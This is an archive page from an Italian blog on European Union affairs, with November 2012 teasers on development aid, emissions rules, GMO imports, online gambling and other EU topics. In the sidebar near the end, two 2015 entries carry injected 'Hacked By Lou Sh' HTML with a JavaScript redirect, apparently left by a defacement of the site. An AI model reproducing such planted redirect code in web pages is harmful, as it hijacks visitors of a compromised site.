EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Novembre 2012
it

Le popolazioni nel mondo che vivono in difficoltà devono avere assistenza dall'UE, anche nel contesto di una crisi economica globale. È quanto emerge dal recente Eurobarometro sugli aiuti allo sviluppo pubblicato dalla Commissione europea.

Secondo l’84% degli intervistati, l’appoggio dell’Unione europea deve continuare ad esserci a prescindere dalla condizione economica precaria. Molti sono concordi con il dire che bisogna dare più fiducia alla Commissione europea invece che agli aiuti offerti dai singoli Stati e quindi sono propensi (...)

it

Catherine Ashton, Alto rappresentante UE per la Politica estera comune, arriva a Beirut e rassicura il Paese dopo la nuova ondata di morti che lo sta investendo. A seguito dell’attentato e dell’uccisione del generale Wissan Al Hassan si sono susseguiti molti disordini, per questo la Ashton ha voluto sottolineare l’apprezzamento dei tentativi che le massime cariche dello stato libanese stanno facendo per mantenere l’ordine.

Mentre il Libano soffre perdite innocenti e disordini per tutto il paese, l’Unione europea cerca di dare tranquillità e lo fa inviando Catherine Ashton, Alto rappresentante per la Politica estera dell’Unione europea, a Beirut per dei brevi ma decisivi incontri con le massime cariche del paese, (...)

it

Si chiama “Zoe va controcorrente” l’app rilasciata dalla Commissione europea in collaborazione con la Direzione Ambiente. Pensata per i bambini di età compresa tra i 7 e gli 11 anni, l’iniziativa si pone come obiettivo quello di sensibilizzare i più piccoli sulle tematiche ambientali e far sì che essi possano approfondire, tramite divertenti animazioni, elementi interattivi e parti più serie a valenza didattica, le loro conoscenze sul ciclo idrologico e sul trattamento delle acque.

Chi l’avrebbe mai detto che anche la Commissione europea avrebbe, prima o poi, ceduto alla moda delle app?! E invece è successo! Così, tra le tante applicazioni che ogni giorni vedono la luce - alcune delle quali, diciamolo, hanno un’utilità quantomeno discutibile – è arrivata lei, “Zoe va (...)

it

Dopo ben sette anni di dibattiti e discussioni si è arrivati ad una conclusione: l’epilogo non è stato però quello che ci si aspettava. Il regolamento che prevedeva un’informativa maggiore e che obbligava a identificare tutto ciò che proveniva da Paesi extraeuropei è stato ritirato. La sfida volta a difendere la qualità e la produzione interna è stata persa e non sono mancate le polemiche.

Nella serata di martedì 23 ottobre, la Commissione europea, nella figura del Commissario al Commercio Karel de Gucht, ha comunicato a sorpresa una decisione che ha colto alla sprovvista l’intera Europa. Il commissario Karel de Gucht ha infatti annunciato di aver abbandonato il progetto e (...)

it

Una delle spiegazioni date per giustificare la scelta è stata la resistenza che questo tipo di mais ha verso i Lepidotteri, ordine di insetti olometaboli, a cui appartengono le comuni farfalle e falene. La Commissione ha deciso di accettare l'importazione anche per un altro motivo fondamentale: il Mir 162 di Syngenta è costituito in parte dalla Vip, vegetative insecticidal protein, una proteina appunto, e da un enzima, il Pmi (fosfomannosio isomerasi), che lo differenziano dagli altri Ogm, i quali sono sprovvisti di tali caratteristiche. E' importante ricordare che questo tipo di mais non potrà essere coltivato in Europa, la sua importazione sarà destinata solamente all'alimentazione umana ed animale.

La definitiva approvazione è arrivata dopo il consueto controllo di verifica (e successiva approvazione) dell’Autorità europea per la sicurezza alimentare (EFSA). La decisione è stata presa dalla Commissione, cosa che non dovrebbe accadere di norma. Analizzando la situazione però si capisce il (...)

it

Lo scorso luglio la Commissione ha offerto la possibilità di ospitare le iniziative dei cittadini europei sui suoi server. Tutto ciò per ovviare ai problemi sempre più spesso rilevati da alcuni organizzatori, sia nel trovare soluzioni di hosting adatte, che nell'assetto dei propri sistemi di raccolta per via elettronica.

La collaborazione con il “Ministère de la Fonction publique et de la rèforme administrative – Centre des Technologies de l’Information de l’Etat (CTIE)” del Lussemburgo, ha funzionato proprio in questo senso. Il CTIE lussemburghese è infatti l’autorità di certificazione incaricata, in tale Paese sono (...)

it

Era il febbraio del 2009 quando l'Unione europea varava il progetto “Erasmus for Young Entrepreneurs”.

Un piano di mobilità per aiutare giovani imprenditori (o aspiranti tali), ad acquisire le abilità necessarie per gestire un’impresa di piccole o medie dimensioni, attraverso un periodo di lavoro e collaborazione presso un’azienda dei vari Paesi membri. Dopo tre anni di attività, agli scorsi (...)

it

I dati sono stati resi pubblici dall'Agenzia europea dell'ambiente e confermano l'impegno degli Stati membri nell'abbattimento delle immissioni di gas a effetto serra, come concordato con la sottoscrizione del protocollo di Kyoto.

Lo scorso anno le emissioni di gas a effetto serra nell’Unione europea sono state ridotte del 2,5% rispetto al 2010. Infatti, sebbene siano stati registrati dati fortemente discordanti, nel 2011 i Paesi del Vecchio Continente si sono impegnati nell’adempimento delle misure deliberate nel (...)

it

La maggiore preoccupazione dell'Unione europea riguarda le emissioni delle auto, le quali vanno a peggiorare le già precarie condizioni dell'ambiente in cui viviamo. In particolare le nuove automobili dovranno essere equipaggiate con degli indicatori di cambio di marcia, che andranno in aiuto degli automobilisti nel momento in cui questi dovranno cambiare marcia, in modo da ridurre in primis le emissioni di CO2 e poi per fornire un sostegno nell'ambito dei consumi.

L’Europa che conta ha finalmente fatto la voce grossa in ambito automobilistico. Molti problemi sorgono ogni anno, altri sicuramente ne nasceranno, intanto però l’UE ha deciso di dare una svolta alla produzione dei nuovi autoveicoli, fornendo precise indicazioni e dettagliate spiegazioni ai (...)

it

La lotta per un’Europa migliore continua. Questa volta nel mirino di Bruxelles è finito il gioco d’azzardo online e tutto ciò ad esso connesso come siti illegali, pubblicità ingannevole, mancato rispetto dei diritti dei minori e partite truccate. L’obiettivo è una maggiore collaborazione al fine di tutelare i consumatori w garantire scommesse legali.

La Commissione europea ha presentato, nei primi giorni di novembre, un nuovo piano d’azione contro il gioco d’azzardo sul web. L’obiettivo è quello di agire in maniera decisa e tempestiva in modo da poter salvaguardare gli interessi dei consumatori, mettendoli al riparo dalla pubblicità (...)

it

A dispetto dei suoi interventi per una risoluzione del conflitto israelo-palestinese, l’UE continua ad importare prodotti provenienti da insediamenti illegali israeliani. 22 Organizzazioni non governative, laiche e cristiane, tra cui la Federazione Internazionale per i Diritti Umani (Fidh), Christian Aid (Irlanda e Regno Unito), IKV Pax Christi (Paesi Bassi) e la danese DanChurchAid, lo hanno denunciato in uno studio molto accurato realizzata in collaborazione con un ex Commissario europeo, l’olandese Hans van den Broek.

"Con decine di dichiarazioni ufficiali l’UE riafferma continuamente l’illegalità degli insediamenti secondo il diritto internazionale e -spiega Van den Broek- li considera come il maggiore ostacolo alla pace. Ma mentre la costruzione degli insediamenti accelera, noi europei non siamo riusciti a (...)

it

La Commissione europea ha adottato le nuove norme che precisano le regole per la gestione finanziaria e l’accesso ai fondi dell’UE a favore di vari organi come imprese, organizzazioni non governative, ricercatori, studenti, città e altre istituzioni.

Il testo proposto dalla Commissione europea è stato pubblicato lo scorso 27 ottobre 2012. Nei successivi due mesi il Parlamento e il Consiglio europeo, potranno muovere obiezioni o proporre le loro opinioni riguardo la normativa. Il nuovo regolamento, una volta entrato nella Gazzetta Ufficiale, (...)

it

Lo sconfitto repubblicano Mitt Romney si è congratulato al telefono con lui. Nel suo primo discorso Obama ha esordito ringraziando la moglie, le figlie e tutti i suoi elettori e sostenitori, dicendo “il meglio deve ancora venire”.

Tante le dichiarazioni e i commenti dei leader politici, dall’Europa e dal mondo. I politici italiani di quasi tutti gli schieramenti hanno elogiato il trionfo di Obama, partendo da Nichi Vendola (Sinistra ecologia e libertà), che per primo ha esordito su Twitter: “Four more years. Obama ce l’ha (...)

it

Il Partenariato orientale si inserisce nel quadro delle politiche esterne dell'UE e precisamente all'interno dell'area della politica europea di vicinato, volta a costruire legami più solidi con i paesi situati a est e a sud, in prossimità dei territori dell'Unione.

Come suggerisce il nome, il Partenariato orientale è indirizzato ai paesi ad est dell’UE, nello specifico agli stati post-sovietici di Armenia, Azerbaigian, Georgia, Moldavia, Ucraina e Bielorussia. La paternità del progetto appartiene alla Polonia, che ha successivamente redatto la proposta con (...)

it

L'Unione europea, soprattutto in questo periodo, sta tentando di ristabilire quei settori che tanto hanno dato e tanto, a loro detta, potranno dare negli anni futuri. Come non coinvolgere il mercato dell'auto in questo discorso, visto che, direttamente o meno, vi sono coinvolte circa dodici milioni di persone? In quest'ottica l'iniziativa prevede importanti novità, le quali aiuteranno uno dei settori che più ha risentito della crisi economica mondiale. Come se non bastasse, la richiesta è in continua diminuzione mentre la concorrenza aumenta a dismisura mese dopo mese.

"L’Europa produce le migliori automobili al mondo. La Commissione intende che essa mantenga questa posizione di leadership facendo ancora ulteriori progressi in tema di resa ambientale e di sicurezza. La Commissione pertanto presenta oggi una strategia per l’industria automobilistica dell’Ue e (...)

18
11
2012

Let’s go Sweden!

it

Let’s go Sweden! è il nuovo appuntamento dedicato alla mobilità dei giovani in Svezia.. Un ottimo collegamento tra università e lavoro pensato per i giovani con lo scopo di dare informazioni pratiche per studiare, vivere e lavorare in Svezia.

Let’s Go Sweden! Stai pensando di trasferirti all’estero per trovare lavoro ma non sai dove? La Svezia potrebbe essere un’ottima meta: moltissime le possibilità offerte ai giovani, sia svedesi che stranieri, per poter accedere al mondo dell’istruzione e della formazione. Il sistema utilizzato dal (...)

it

Nuova inchiesta della Commissione europea. L’attenzione di Bruxelles si sposta ad Oriente, verso il Governo cinese reo di aver agevolato finanziariamente le industrie locali operanti nel settore dei pannelli solari. La denuncia da parte dell’associazione dei produttori fotovoltaici europei ha spinto l’Esecutivo europeo ad agire. Ora inizia l’indagine che proseguirà per il prossimi tredici mesi.

Lo scorso 8 novembre, la Commissione europea ha deciso di avviare una nuova inchiesta riguardante l’importazione di pannelli solari cinesi e i presunti privilegi finanziari del Governo cinese a danno del mercato dell’UE. Il procedimento fa seguito ad un’altra inchiesta avviata da Bruxelles due (...)

it

Pensi che l'UE sia troppo lontana dai tuoi bisogni? Che si occupi solo di crisi dell'Eurozona, negoziazioni, equilibri politici internazionali? Vorresti che le tue richieste fossero maggiormente ascoltate e discusse dai leader europei? La Rappresentanza in Italia della Commissione europea favorisce il dialogo diretto tra cittadini e Commissari europei con l'iniziativa "Dialogo con i cittadini", una serie di incontri in giro per l'Italia con la partecipazione diretta dei Commissari europei.

Gli appuntamenti saranno l’occasione ideale per avvicinare il cittadino all’UE e per discutere proposte su come migliorare la qualità della sua vita, ma anche sulle speranze e le attese sul ruolo e sul futuro dell’Unione europea. Anche il format degli incontri è stato pensato per facilitare il (...)

it

Ridurre in misura significativa le emissioni di gas fluorurati. È questa la proposta di regolamento presentata, lo scorso 7 novembre a Bruxelles, dalla Commissione europea e avente come obiettivo quello di ridurre di 2/3 - entro il 2030 - il livello di emissione di questi gas, aumentate del 60% dal 1990 a oggi. Solo così sarà finalmente possibile combattere il riscaldamento globale.

Cosa sono i gas fluorurati? I gas fluorurati rientrano nella categoria dei gas serra, quei gas cioè presenti nell’atmosfera e che, pur essendo trasparenti alla radiazione solare in entrata sulla Terra, “riescono a trattenere, in maniera consistente, la radiazione infrarossa emessa dalla (...)

it

La lettura digitale fa ancora parlare di sé. Questa volta ad essere messa in discussione è la tassazione imposta sugli ebook e, in modo particolare, il richiamo verso Francia e Lussemburgo, le quali hanno autonomamente deciso di impostare un’IVA nettamente inferiore rispetto a quella stabilita dalla Commissione europea.

Gli ebook in Europa Sembra quasi una punizione quella inflitta al mercato degli ebook da parte della Commissione europea. Da tempo il quesito che assilla i più assidui sostenitori del libro digitale è come mai il loro prezzo sia di poco inferiore a quello dei testi cartacei. I costi di (...)

it

Tim Hunt e Jules A. Hoffmann guidano lo schieramento di premi Nobel sceso in campo per combattere le drastiche misure finanziarie, che probabilmente colpiranno il settore europeo della ricerca.

Nella giornata di giovedì 15 novembre, i due scienziati hanno consegnato al Presidente della Commissione europea Barroso, al Presidente del Parlamento europeo Schulz e al Presidente del Consiglio europeo Von Rompuy, copia della petizione on line volta a tentare di impedire la riduzione dei fondi (...)

it

Lo affermano i risultati di uno studio della camera di commercio belgo-italiana relativo ai finanziamenti europei a gestione diretta nel triennio 2009-2011.

Emerge dall’indagine una differenza tra la gestione dei finanziamenti indiretti, che prevedono l’intervento delle regioni nella redistribuzione sul territorio, e la gestione dei finanziamenti diretti, erogati direttamente dalla Commissione europea attraverso appalti e progetti. Se le Regioni (...)

it

Agevolare la concessione dei visti d’ingresso nell’UE per facilitare la crescita dei flussi turistici, sostenere lo sviluppo economico e la creazione di posti di lavoro ma senza rinunciare alla sicurezza: questo in sintesi, l’obiettivo della comunicazione che vuole dare stimoli ad un settore come quello del turismo che nel 2011 ha garantito 18,8 milioni di posti di lavoro in Europa, diventando una delle principali fonti di occupazione nell’Unione ed un importantissimo motore di crescita economica e sviluppo. Nel 2022 dovrebbe, secondo le previsioni, assicurane 20,4 milioni.

Gli importi spesi da stranieri nel 2011 sono stati pari a 330,44 miliardi di euro che, nel 2022, diventeranno 427,31 miliardi. Secondo i dati dell’Esecutivo UE, il numero di visti rilasciati è in aumento. Nel 2011 infatti si è registrato un incremento soprattutto per le domande provenienti da (...)

it

La Georgieva ha fatto questa richiesta da Cipro, dove si trovava per partecipare ad un importante incontro di esperti internazionali riguardo le pratiche di volontariato, i quali cooperano in maniera attiva con la Protezione Civile e compiono vari interventi umanitari. All'intervento ha partecipato anche Eleni Mavrou, Ministro degli Interni della Repubblica di Cipro, che ha fatto trasparire una certa preoccupazione ma anche un cauto ottimismo verso l'operazione. Non sarà sicuramente facile ingaggiare nuove reclute visto la delicatezza della situazione di alcuni stati menzionati dal commisario Ue, ma l'Unione europea spera che questo intervento possa aver aiutato in tal senso.

Kristalina Georgieva Il commissario dell’Ue mentre tiene il suo discorso La richiesta della Georgieva si articola in sei punti principali. Il primo si apre con un elogio nei confronti di Cipro, paese a suo dire sempre attivo nelle questioni umanitarie, anche a causa dei trascorsi che (...)

it

Nella relazione elaborata dalla rete Eurydice per conto della Commissione europea e presentata la scorsa settimana, appare chiaro come il sistema d'istruzione europeo presenti delle gravi lacune in tema di insegnamento delle abilità riguardanti le tecnologie dell'informazione (TI) e l'imprenditorialità.

Il dato evidente è che le scuole europee non prestano a tali capacità, cosiddette trasversali, sufficiente attenzione, mantenendo il focus su quelle di base, ossia leggere e scrivere, la scienza e la matematica. Altro aspetto trascurato è l’insegnamento del tema della cittadinanza. Insegnamento (...)

it

Dall'azione congiunta dei massimi organi decisionali dell’Unione Europea è partita una nuova iniziativa: per celebrare i vent'anni dall'istituzione della cittadinanza europea e del Trattato di Maastricht del 1993, il 2013 sarà l’«Anno Europeo dei cittadini». L’obiettivo è quello di far conoscere meglio ai cittadini europei i propri diritti e di renderli più partecipi alla vita decisionale dell’Europa.

A vent’anni dalla firma del Trattato di Maastricht e dall’introduzione della cittadinanza europea, il Consiglio e il Parlamento Europeo hanno proclamato il 2013 “Anno Europeo dei cittadini”. La decisione del 23 novembre arriva dopo un lungo iter procedurale legislativo che mosse i suoi primi passi (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France